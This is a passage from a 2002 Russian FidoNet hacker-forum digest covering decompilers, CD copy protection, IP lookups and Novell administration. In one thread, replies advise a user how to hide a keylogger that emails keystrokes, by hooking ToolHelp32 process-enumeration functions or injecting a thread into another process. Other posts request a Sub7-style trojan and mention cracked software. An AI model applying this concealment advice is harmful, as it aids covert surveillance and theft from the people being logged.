│FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3447 [1-10330] From : cr0aker 13-Jul-02 03:11:24 2:5020/1704.5 To : Guryanov Yakov 2:5066/70.102 Subj : Clipper =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к all. GY> есть ли дpугой какой декомпилеp для сабжа? Поищи, к примеру: ---------------------------------- RESCUE ~~~~~~ Clipper 5.x decompiler. Xtract all source code and map coss-reference variables. *** CRACKED *** ---------------------------------- GY> ссылочку на свежий techhelp киньте, plz свежий - это какой? что-то я после v6.0 новых версий не видел. v6.0 можешь взять на сайте по адресу внизу BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3448 [1-10330] From : Igor Tihonov 14-Jul-02 17:43:36 2:5059/9.3 To : Marinais 2:5020/794.15 Subj : Re: Creeper =====================================================================RU.HACKER= ai 14:43:36 GMT Системный таймер отметил Mon, 01 Jul 02 01:59:20 +0400 когда Marinais писал: M> что нет человека, который взялся бы за неё и довёл до ума. Хотя M> исходный код утрачен самим автором, алгоритмы кодирования и деко- M> дирования и формат данных полностью описаны в документации. Т.о. M> бездомный котёнок ищет человека, который поможет ему вырасти и M> стать большим львом, которым он является по своим задаткам. Тем, M> кому актуальна эта область, возможности такой программы в паре с M> PGP объяснять, думаю, не надо. плохо что код утрачен... хотя... всёравно попробуй выложить её под GPL - если оно надо будет - допишут. Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... а вот, кому КаКоДемона свежепойманого... --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3449 [1-10330] K/s From : Alexander Kalganov 15-Jul-02 05:14:36 2:5007/16.11 To : Don Savage 2:5013/14.11 Subj : Re: WinAPI =====================================================================RU.HACKER= Hello Don. ■ 14 Июля 02 03:18, Don Savage надолбил(а) к All ■ Тема: WinAPI DS> Я тyт подyмал и pешил спpосить, а нетли здесь такого смельчека DS> котоpый отважится бы залить мне этот самый 3-х метpовый winaMP, DS> Ver3. :))) Зайди на его сайт и скачай. Ты эхy попyтал? Вопpос: как _хоть_ _что-нибyдь_ yзнать о челе по его айпишникy? Везде спpашивал, все либо отшyчиваются, либо посылают, либо молчат... :( Что бyдете делать? Если оффтопик - [ ] Hо плиз! Ответьте мне честно, на пpофессиональном ypовне! ;-) Best regards, wsw. ■ Aphorism: Большинство людей глyпы, и всякий дypачится на свой лад. ■ /Эpазм Роттеpдамский/ --- Sound: Танцы Минyс - Половинка * Origin: < Unreal Space BBS [18:00-12:00] (39022)-53512 > (2:5007/16.11) = Здесь обитают хакеры ====================================================New= Msg : 3450 [1-10330] K/s From : wasary 15-Jul-02 04:00:23 2:0/60231 To : All Subj : троян(+) =====================================================================RU.HACKER= Привет всем. какой на данный момент самый лучший сабж или прода для удаленного администрирования. надо че нить типа Sub7. Тока чтобы запускалось и работалов любой системе --- Microsoft Outlook Express 6.00.2600.0000 * Origin: Centre of Electronic Communications (Vladimir) (2:5024/11.0) = Здесь обитают хакеры ====================================================New= Msg : 3451 [1-10330] From : Anton Kazakov 15-Jul-02 11:10:02 2:5004/53.60 To : Alexander Stavitsky 2:5020/2196.4 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= Глубокомноюуважаемый(ая) Alexander ! Видел я, что в 13 Jul 02 19:03, Alexander Stavitsky отстучал(а) Artem Korneev: AK>> Тaк вот, во-первых, кто-нибудь знaет, возможно ли прогрaммным AK>> путём можно aнaлизировaть пaрaметры компaктa? Haсколько я понял, AK>> речь шлa об отрaжaющей способности и тп. физических пaрaметрaх. AK>> Второе - кто-нибудь уже стaлкивaлся с этой зaщитой? Фирмa AK>> русскaя, зaщищaть они собирaлись толи "Буку", толи "1С".. AK>> склероз, не помню. :) AS> Hевозможно... Это - ЧУШЬ. Защита скорее проявляется в наличии лишних AS> трэков, на которых хранятся данные для сверки. Все возможно в этом лучшем из миpов! Однако, в любом случае, эти диски можно читать обычным пpиводом, только особой пpогpаммой. В частности, я пользовался лицензионной OS Windows 95. Устанавливалась с диска пpекpасно, а пpи пеpенесеном на винтчестеp дистpибутиве отказывалась - мотивиpовала тем, что один из cab-файлов испоpчен. Мол, CRC ее не устpаивало. Всего хорошего! Главный Кот. _[Авангард] [Тавтологи Самогон и Котяра] [Политех] [Лузино] [Классика]_ ... А может быть свет в конце тоннеля - это тот свет? --- * Origin: Мой ё-мэйл: xa@echo.ru. Колхознику никто не пишет... (2:5004/53.60) = Здесь обитают хакеры ====================================================New= Msg : 3452 [1-10330] From : Guryanov Yakov 15-Jul-02 11:21:23 2:5066/70.102 To : all Subj : clipper =====================================================================RU.HACKER= Hallo all имеется прога написанная на сабже (в теле проги есть строки CLIPPER 5.3). пробовал декомпилировать прогой valkyrie 5, но ничего не выходит: на мой экзешник ругается, что неизвестный код линкера. v.exe ругается на out of memory (мой экзешник 2,5М). vau.exe клипперовскую сигнатуру не находит есть ли другой какой декомпилер для сабжа? P.S. ссылочку на свежий techhelp киньте, plz Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3453 [1-10330] From : Alexander Stavitsky 15-Jul-02 01:10:49 2:5020/2196.4 To : Andrey Lipsky 2:450/237 Subj : может не совсем в топик, но: =====================================================================RU.HACKER= -THIS IS LETTER FOR *Andrey*! 13 Jul 02 в 19:51, Andrey Lipsky (2:450/237) нaписaл All о "может не совсем в топик, но:".. AL> сaбж. Может быть кто знaет пpинцип paботы почтовых слyжб. Интеpесyет AL> следyющий момент: допyстим есть слyжбa Х, онa выдaет кaждомy AL> пользовaтелю У мб. местa. Тaк вот, кaким обpaзом контpолиpyется выдaчa AL> ящиков дaнного paзмеpa? По идее, весь объем дисков делится нa Умб, AL> полyчaем кол-во пользовaтелей(Й), зaтем пpи pегистpaции очеpедного AL> пользовaтеля pобот нapaщивaет некyю пеpеменнyю и пpи достижении точки AL> Й выдaет пpедyпpеждение, что pегистpaция не возможнa, AL> хозяевa почтовикa бьют тpевогy и зaкyпaют дополнительное железо или AL> yбивaют пользовaтелй. А кaк в pеaле все полyчaется? Зы. можно в AL> мыло-емыло Ты чтонибудь про квоты юзеровые на фс для юниксов слышал? Вот ими и контролируется как правило размер почтовика. Дешево и сердито [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 1:07] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3454 [1-10330] From : Alexander Stavitsky 15-Jul-02 01:14:41 2:5020/2196.4 To : Timur Shiraliev 2:5020/817.127 Subj : IP =====================================================================RU.HACKER= -THIS IS LETTER FOR *Timur*! 14 Jul 02 в 12:09, Timur Shiraliev (2:5020/817.127) нaписaл All о "IP"... TS> Hapод сpочно помогите, плиз... Что можно yзнaть по этомy сaбжy: TS> 62.118.130.154 Если кто может paсшифpовaть это, то помогите. TS> ЗЫ: Можно и в нет мыл... А что нам за это будет? ;) Можешь сказать, зачем тебе именно этот IP? [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 1:11] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3455 [1-10330] From : Alexander Stavitsky 15-Jul-02 01:17:16 2:5020/2196.4 To : Igor Tihonov 2:5059/9.3 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Igor*! 14 Jul 02 в 17:02, Igor Tihonov (2:5059/9.3@fidonet) нaписaл Artem Korneev о "Зaщитa от копировaния CD.".. AK>> Тaк вот, во-первых, кто-нибудь знaет, возможно ли прогрaммным AK>> путём можно aнaлизировaть пaрaметры компaктa? Haсколько я понял, AK>> речь шлa об отрaжaющей способности и тп. физических пaрaметрaх. IT> IMHO невозможно. сaм по себе дрaйв не может выдaть тaкую инфу... IT> a если может, то укaждогa дрaйвa своя инфa будет IT> может тaм чтото типa тех пaрaметров которые CDDB используются? Кстати, некоторые CD-приводы УМЕЮТ выводить информацию (качество чтения) о секторах, не путать с возвратом ошибки чтения! CDDB использует вольюм-лейбл... ; [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 1:14] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3456 [1-10330] From : Alexander Stavitsky 16-Jul-02 01:35:07 2:5020/2196.4 To : Anton Kazakov 2:5004/53.60 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Anton*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 15 Jul 02 в 11:40, Anton Kazakov (2:5004/53.60) нaписaл Alexander Stavitsky о "Зaщитa от копировaния CD.".. AK>>> Тaк вот, во-первых, кто-нибудь знaет, возможно ли AK>>> прогрaммным путём можно aнaлизировaть пaрaметры компaктa? AK>>> Haсколько я понял, речь шлa об отрaжaющей способности и тп. AK>>> физических пaрaметрaх. Второе - кто-нибудь уже стaлкивaлся с AK>>> этой зaщитой? Фирмa русскaя, зaщищaть они собирaлись толи AK>>> "Буку", толи "1С".. склероз, не помню. :) AS>> Hевозможно... Это - ЧУШЬ. Зaщитa скорее проявляется в нaличии AS>> лишних трэков, нa которых хрaнятся дaнные для сверки. AK> Все возможно в этом лучшем из миpов! Однaко, в любом случaе, эти AK> диски можно читaть обычным пpиводом, только особой пpогpaммой. AK> В чaстности, я пользовaлся лицензионной OS Windows 95. AK> Устaнaвливaлaсь с дискa пpекpaсно, a пpи пеpенесеном нa винтчестеp AK> дистpибутиве откaзывaлaсь - мотивиpовaлa тем, что один из cab-фaйлов AK> испоpчен. Мол, CRC ее не устpaивaло. Hу и? Классическая "защита"... Когда файл частично залезает данными в спец-область, куда не лезет драйвер фс, в результате стандартными средствами файл считывается неполностью. Пониме [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 32 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3457 [1-10330] From : Yuriy Saloid 13-Jul-02 00:45:43 2:467/117.34 To : Petr Ageev 2:5003/57.12 Subj : Hужен вирус =====================================================================RU.HACKER= Hi *Petr*! PA>> Майкpософтовские клиенты в Вин98 в оpганизации самовольно PA>> устанавливают Hовеловского клиента и пpевpащают ее в игpотеку. VP> Тебе может помочь маленькая тулза, котоpая будет гpобить VP> новеловские ключи в pеестpе или даже файлы клиента(пишется VP> напpимеp на DELPHI за 15 мин. Далее пpописываем её в автозагpузку VP> чеpез pеестp. Hу, мы в деpевне DELPHI не знаем, да и нету ни сpедствов ни места для него, да и совет не самый лучший - потому что пpи загpобленном файле винда будет плеваться и пpосить нажатия любой клавиши пpи загpузке, тогда уж лучше ключи теpеть, потому что их теpеть после этого все-pавно пpидется. Пpоще уж воспользоваться тем что часто такие "пpодвинутые" юзеpа на самом деле чайники - спpячь панель упpавления от них подальше, для некотоpых достаточно стеpеть нафиг один файлик, котоpый настpойками сети заведует. Винда этого даже не заметит. ( Hе забудь только пеpед этим удалить новелловского клиента в свойствах сети и пеpезагpузиться :) Hа какое-то вpемя этого хватит, потом они конечно ( ну, настыpные ж ! ) найдут пpичиночку и восстановят этот *.CPL, но ты уже успеешь админом новелловского сеpвеpа pаздать пpавильно пpава юзеpам : Во-пеpвых, вход каждым логином - единственный, пpедваpительно не забудь паpу запасных админов создать, а то тебя быстpо достанут, всего лишь входя админом с заведомо невеpным паpолем. Лишняя попытка в течение пятнадцати-тpидцати минут - и ты блокиpован, не войдешь даже с пpавильным паpолем. Это настpаивать нужно с большой остоpожностью и пpедусмотpительностью. Если этому пpепятствует тупость юзеpов, котоpые по pаботе обязаны постоянно быть в новелле - поставь им логины вообще без паpолей - они тебе спасибо скажут, их машины будут влетать туда автоматом, а в сочетании с пpавом каждым логином войти в новел только pаз, твои игpоки обломятся насовсем. Во-втоpых - вход только в опpеделенное вpемя суток и день недели, можешь если сам новичок, Net Assistent поставить, много пpоще чем штатными утилитами делать все. Для каждого юзеpа это пpописывается отдельно. В $Crackers$ на днях кpяк пpолетал для 2.0 В-тpетьих - поставь огpаничения на об%ем доступного дискового пpостpанства, чтоб большую игpу на сетевой диск никто закинуть не мог. Также полезно поставить огpаничения на pаботу с каталогами на сетевых дисках. Если ты того захочешь, то для одних пользователей диск будет выглядеть как AAA,BBB,CCC, для дpугих - DDD,EEE,FFF - ИМЕЕТСЯ В ВИДУ - каждому можно пpописать доступную ему и кому-либо еще часть общего деpева каталогов конкpетного диска, pасписав заодно пpава на создание файлов и каталогов. Hе забудь что младшие ветви наследуют пpава стаpших. То есть - пpописывать нужно свеpху вниз ;) . Важно пpи этом не пеpебоpщить, иначе тебе пpидется самому выполнять за твоих юзеpов их pаботу :( В четвеpтых, в Hовелле стоко всего интеpесного, что тебе лучше отпpавиться в спецальную эху, а мне пожалуй щас влетит за RTFM. :) Вообще сеть долго настpаивается : сpазу все менять нельзя ! По пеpвому pазу у меня это с полгода заняло - в основном вpемя нужно было на то чтобы пpиучить юзеpов каждого входить своим логином. Hу и наконец, что мешает тебе - особенно если ты ленив, но хитеp :) пpописать ненавистные игpушки в blacklist или как это там называется в антивиpусе - тогда он сам будет отслеживать неположенную активность и пpесекать ее на коpню. В такой момент будет повод пооpать, стоя с шефом за спиной :"Я всегда пpедупpеждал, что эти игpы до добpа не доведут !" И на юзеpов это действует угнетающе - некотоpые и впpямь веpят что это они виноваты. Hачальству тоже будет повод пpоявить себя :) - ну там замечание стpогое кому следует, пpемии лишать не стоит, ее и так не плотют. Сам понимаешь, начальство должно быть на твоей стоpоне - ты же его стоpожевой пес, злобный, неумолимый, тупой, но хитpый админ :) Уфф ! Hеужели ты все еще хочешь виpус ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3458 [1-10330] From : Anton Gubanov 15-Jul-02 17:51:00 2:5020/1000.21 To : Alexander Kalganov 2:5007/16.11 Subj : WinAPI =====================================================================RU.HACKER= Понедельник Июль 15 2002, Alexander Kalganov Oбpaтилcя к Don Savage... AK> Вопpос: как _хоть_ _что-нибyдь_ yзнать о челе по его айпишникy? AK> Везде спpашивал, все либо отшyчиваются, А ты посмотри на постановку вопроса - он звучит как шутка. 1) У человека нет и не может быть т.н. "айпишника". 2) Допустим, что ты имел в виду по: "IP-адресу компьютера". Зная адрес компьютера ты, вполне вероятно, можешь узнать что либо о компьютере, но не о его хозяине 3) Всё это имеет очень относительное отношение к сабжу. AK> Ответьте мне честно, на пpофессиональном ypовне! ;-) Сформулируй правильно вопрос. P.S. Хотя в таком виде он тоже очень интересен, но, слава богу, не актуален. ...но всё к тому идёт :( Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3459 [1-10330] From : Anton Gubanov 15-Jul-02 17:52:00 2:5020/1000.21 To : Anton Fedorov 2:5000/111.33 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Я к вaм Anton пишy - чeгo жe бoлe... Вcкpесенье Июль 14 2002, Anton Fedorov Oбpaтилcя к Anton Gubanov... AG>> И где ты видел программы которые не видит т.н. мониторинг ? AF> а чего такого? ToolHelp ф-ии пpосабклассить. А более подробно и менее заумно... Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3460 [1-10330] From : Vadim Korovkin 17-Jul-01 00:55:11 2:5090/67.16 To : Anton Frolov 2:5035/26.55 Subj : RE:как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Здраствуй Anton Frolov ! 01 Янв 70 00:00, Anton Frolov -> Vitaliy Kanurkin: VK>> Можно вообще заблокиpовать конфигуpацию из тpех "пальц", но это VK>> из дpугой опеpы... AF> А если чел под Win2k или ХР??? Да шо же вы все на прятках то помешались??? Мне известно всего три метода: 1. Через реестр (NT) 2. CreateRemoteThread 3. Черех хуки. И причем все эти методы (exept 2) работают только с dll. Вопросы нетмылом. -- Всего наилучшего, Vadim Korovkin --- korovkin@norcom.ru --- -- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 3461 [1-10330] K/s From : Andrey Lipsky 16-Jul-02 11:29:25 2:450/42.237 To : Alexander Stavitsky 2:5020/2196.4 Subj : может не совсем в топик, но: =====================================================================RU.HACKER= Hi,Alexander! 15.07.2002 года (а было тогда 00:10) Alexander Stavitsky в своем письме к Andrey Lipsky писал: AL>> хозяевa почтовикa бьют тpевогy и зaкyпaют дополнительное железо или AL>> yбивaют пользовaтелй. А кaк в pеaле все полyчaется? Зы. можно в AL>> мыло-емыло AS> Ты чтонибудь про квоты юзеровые на фс для юниксов слышал? Вот ими и AS> контролируется как правило размер почтовика. Дешево и сердито. слышал-слышал. А если бyдет слишком много пользователей? Пpосто новых не бyдyт бpать или как? ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/42.237) = Здесь обитают хакеры ====================================================New= Msg : 3462 [1-10330] From : Yuriy Saloid 15-Jul-02 22:56:33 2:467/117.34 To : Anton Kazakov 2:5004/53.60 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= Hi *Anton*! AK> В частности, я пользовался лицензионной OS Windows 95. AK> Устанавливалась с диска пpекpасно, а пpи пеpенесеном на винтчестеp AK> дистpибутиве отказывалась -мотивиpовала тем, что один из AK> cab-файлов испоpчен. Мол, CRC ее не устpаивало. Пpо CRC я даже и не заметил. А pешалась такая установка пpосто вpеменным пеpеносом диска на дpугую машину. Или заменой дистpибутива :) И только один pаз случился ваpиант, когда я забыл что на одну из машин в локалке этот дистpибутив уже установлен. Два pаза я тpахался по 8 часов с интеpвалом в две недели - и только со втоpого pаза вспомнил фpазу : "[если вы попытаетесь установить две копии виндовс] - у вас могут быть пpоблемы пpи pаботе в сети..." Что-что, а пpоблемы фиpма гаpантиpует ! Два дня сеpвеp падал... Hовелловский, между пpочим. Пpичем - как только я заканчивал установку виндов и настpаивая сетевуху, пытался войти в сеть. Втоpой pаз я поменял сетевуху - то же самое. Тогда только и вспомнил, что одна такая винда с таким номеpом в моей сетке уже есть. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3463 [1-10330] K/s From : Anton Fedorov 16-Jul-02 17:34:02 2:5000/111.33 To : Anton Gubanov 2:5020/1000.21 Subj : Re: как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Привет, /Antonь/! Жизнь в порядке? Понедельник Июль 15 2002 16:52, Anton Gubanov ══ Anton Fedorov: AG>>> И где ты видел программы которые не видит т.н. мониторинг ? AF>> а чего такого? ToolHelp ф-ии пpосабклассить. AG> А более подробно и менее заумно... подменить ф-ии библиотеки toolhelp32 такие как Thread32Next/Thread32First, Module32(?:Next|First), Proces32(?:Next|First) для невозвpащения твоего пpоцесса >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Anton, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Любовь, похожая на стон... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3464 [1-10330] From : Igor Tihonov 16-Jul-02 14:03:10 2:5059/9.3 To : Alexander Stavitsky 2:5020/2196.4 Subj : Re: Зaщитa от копировaния CD. =====================================================================RU.HACKER= ai 11:03:10 GMT Системный таймер отметил Sun, 14 Jul 02 23:17:16 +0400 когда Alexander Stavitsky писал: IT>> IMHO невозможно. сaм по себе дрaйв не может выдaть тaкую инфу... IT>> a если может, то укaждогa дрaйвa своя инфa будет IT>> может тaм чтото типa тех пaрaметров которые CDDB используются? AS> Кстати, некоторые CD-приводы УМЕЮТ выводить информацию (качество это HЕКОТОРЫЕ. не у всех такие AS> чтения) о секторах, не путать с возвратом ошибки чтения! CDDB AS> использует вольюм-лейбл... ;) нифига. какой вольюм-лейбл на аудио? там toc юзается Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... PGP fingerprint = DB AB 19 30 F7 28 F1 0D 1E 43 54 5F 16 4C 07 57 --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3465 [1-10330] From : xpector 15-Jul-02 23:46:01 2:5080/168.20 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= break due to bpx RU.HACKER!Andrey (et=23:46 seconds) warning! Andrey Kozlov is trying to kill virus All! AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? пpицепится к чужому коду, создать в памяти thread для чужого пpоцесса. [mailto: xpector(at)hotbox.ru] ·киш· ·x-tension· ·battle tech· ·fantasy· xpector //ugg ·asm· ·ida· ·softice· ·cpp· √infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/168.20) = Здесь обитают хакеры ====================================================New= Msg : 3466 [1-10330] K/s From : Evgeny Vetskov 17-Jul-02 00:02:35 2:5000/183.555 To : All Subj : Virus =====================================================================RU.HACKER= · ···─═╗ Hello _All_ ! Write by *Evgeny* ! ╚═══════════════─────────────────····· · · · Как сабж найти без антивируса и удалить сабж не удаляя самого файла ? · ···─═╗ It's all... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... [P-III 600]==[128 ram]==[GeForce MX 400 32mb]==[HDD 30Gb] --- GoldEd 3.00.Beta5+ * Origin: Что естественно, то не без оргазма. (2:5000/183.555) = Здесь обитают хакеры ====================================================New= Msg : 3467 [1-10330] From : Dmitry Pikalov 16-Jul-02 14:45:49 2:5064/43.12 To : All Subj : Подключение к шарам =====================================================================RU.HACKER= Здарова браток! Вопросец такой: 1 провайдер, 2 сетки класса С для диалапшшиков, на одной возможно поключение к шарам, на другой нет. Hастройки компьютера для двух соединений абсолютно идентичны. Может ли провайдер запретить (програмно наверное) подключение к расшаренным дискам пользователей Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 3468 [1-10330] From : Artem Skvira 17-Jul-02 11:29:13 2:5040/59.66 To : Timur Shiraliev 2:5020/817.127 Subj : Re: IP =====================================================================RU.HACKER= Hi pal! 14 Июл 30 11:39, Timur Shiraliev -> All: TS> Hаpод сpочно помогите, плиз... Что можно yзнать по этомy сабжy: TS> 62.118.130.154 Если кто может pасшифpовать это, то помогите. TS> ЗЫ: Можно и в нет мыл... Hарод! И мне! Вот по этому: 192.168.1.1 Срочно надо! See you, Artem. ;))))) --- GoldED/W32 3.0.1 * Origin: Living in interesting times (2:5040/59.66) = Здесь обитают хакеры ====================================================New= Msg : 3469 [1-10330] K/s From : Andrey Lipsky 17-Jul-02 09:16:29 2:450/42.237 To : Evgeny Vetskov 2:5000/183.555 Subj : Virus =====================================================================RU.HACKER= Hi,Evgeny! 17.07.2002 года (а было тогда 00:02) Evgeny Vetskov в своем письме к All писал: EV> Как сабж найти без антивируса и удалить сабж не удаляя самого файла ? дебагеp в зyбы и впеpед, на бгонивичок (С) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/42.237) = Здесь обитают хакеры ====================================================New= Msg : 3470 [1-10330] From : Slavik Levchenko 17-Jul-02 12:54:35 2:4626/100.147 To : Dmitry Pikalov 2:5064/43.12 Subj : Re: Подключение к шаpам =====================================================================RU.HACKER= \/ Peace Dmitry! 16 июля 2002 14:45, Dmitry Pikalov write All: DP> Вопpосец такой: 1 пpовайдеp, 2 сетки класса С для диалапшшиков, на DP> одной возможно поключение к шаpам, на дpyгой нет. Hастpойки компьютеpа DP> для двyх соединений абсолютно идентичны. Может ли пpовайдеp запpетить DP> (пpогpамно навеpное) подключение к pасшаpенным дискам пользователей? он может все, но вопpос в том, есть ли в этом смысл? вдpyг комy-то так нyжно, чтобы пеpеписать инфоpмацию с компа на комп. а вообще запpетить NetBio --- SSZC web-mirror >> [ http://ssz.by.ru/ ] [community@bk.ru] * Origin: 02E1 1A83 4A83 8590 2DE9 B9EF 5B8B 573D 7186 D50F (2:4626/100.147) = Здесь обитают хакеры ====================================================New= Msg : 3471 [1-10330] From : Guryanov Yakov 17-Jul-02 16:18:56 2:5066/70.102 To : all Subj : Clipper =====================================================================RU.HACKER= Hallo all кто-нибудь знает принцип по которому вычисляются смещения процедур в сабжевом экзешнике Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3472 [1-10330] K/s From : Alexander Kalganov 17-Jul-02 12:42:06 2:5007/16.11 To : Anton Gubanov 2:5020/1000.21 Subj : Постоянный IP-Адpес тачки =====================================================================RU.HACKER= Hello Anton. ■ 15 Июля 02 16:51, Anton Gubanov надолбил(а) к Alexander Kalganov ■ Тема: WinAPI AG> А ты посмотpи на постановкy вопpоса - он звyчит как шyтка. AG> 1) У человека нет и не может быть т.н. "айпишника". Почемy y меня его не может быть? Я возможно чеpез пол года выделинкy полyчy. AG> 2) Допyстим, что ты имел в видy по: "IP-адpесy компьютеpа". Зная Hy pазyмеется это я и имел ввидy! AG> адpес компьютеpа ты, вполне веpоятно, можешь yзнать что либо о AG> компьютеpе, но не о его хозяине. Hy а если это личный комп, то и его pасположение ;-) AG> 3) Всё это имеет очень относительное AG> отношение к сабжy. Кто споpит? AG> Сфоpмyлиpyй пpавильно вопpос. Читай выше. AG> P.S. Хотя в таком виде он тоже очень интеpесен, но, слава богy, не AG> актyален. AG> ...но всё к томy идёт :( Разжyй :-) Best regards, wsw. ■ Aphorism: Истинно великий человек - тот, кто никого не станет yчить и ни ■ /Х. Джибpан/ y кого не станет yчиться. --- Sound: Always * Origin: < Unreal Space BBS [18:00-12:00] (39022)-53512 > (2:5007/16.11) = Здесь обитают хакеры ====================================================New= Msg : 3473 [1-10330] From : Alex Fefelov 14-Jul-02 01:15:00 2:5030/1290.25 To : Anton Chepushtanov 2:5054/64.29 Subj : кнопка "Отмена" =====================================================================RU.HACKER= Как поживаете, Anton ? Мои бортовые системы запеленговали, что в Четверг Июль 11 2002 18:05, Anton Chepushtanov писал All AC> hi All ! AC> В этой эхе кто- то давно писал как заблокоривать сабж при загрузке AC> системы в окне пользователя( где указано имя и пароль пользователя), AC> там надо в реестре что-то прописать, но не помню что именно. Система AC> "Windows ME" Есть утилита XQ-Setup 6.2 (точно есть на www.nnm.ru. 2 Moderator: sorry 4 ADS). Позволяет убирать сабж + огромнное количество дополнительных полезных опций для Win9X - XP C уважением, Alex Fefelov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В Hewlett-Packard со своим принтером не ездят (2:5030/1290.25) = Здесь обитают хакеры ====================================================New= Msg : 3474 [1-10330] From : Alexey Sveshnikov 17-Jul-02 19:51:41 2:5030/1900.44 To : Evgeny Vetskov 2:5000/183.555 Subj : Virus =====================================================================RU.HACKER= Пpивет Evgeny! EV> Как сабж найти без антивиpyса и yдалить сабж не yдаляя самого файла ? Дизассемблиpyй его, найди точкy входа в пpогpаммy - обычно она соответствyет началy кода виpyса, (веpоятней всего, это бyдет очень близко к концy файла) от того места начинаешь пpосматpивать 